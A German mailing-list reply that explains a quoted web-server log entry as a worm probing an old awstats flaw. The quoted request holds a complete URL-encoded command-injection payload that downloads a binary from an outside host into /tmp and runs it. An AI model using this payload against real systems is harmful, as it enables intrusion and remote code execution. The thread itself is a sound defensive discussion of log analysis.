Am Samstag, den 19.11.2005, 17:22 +0100 schrieb Harald Tobias: [..] > 82.234.215.180 - - [15/Nov/2005:03:31:35 +0100] "GET > /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| > > HTTP/1.1" 404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT > 5.1;)"
Wurm. Es gab eine Schwachstelle in awstats, in der eben die configdir-Variable nicht richtig gefiltert wurde. Hier wir versucht, eine Befehlszeile auszuführen. Der Befehl ist dabei URL-kodiert. Die Schwachstelle wurde IIRC schon vor einer ganzen Weile gefixt. Die aktuellen Debian-Pakete sollten für diese Schwachstelle nicht mehr anfällig sein. > Auf meinem Server laufen zwei Anwendungen, die auch nur für einen sehr > begrenzten Personenkreis zugänglich sind. Versucht im ersten Beispiel > evtl. jemand Rechte zu verändern? > > Kann mir vielleicht jemand erklären was da passiert? Übersetz den Befehl halt wieder zurück. MfG Daniel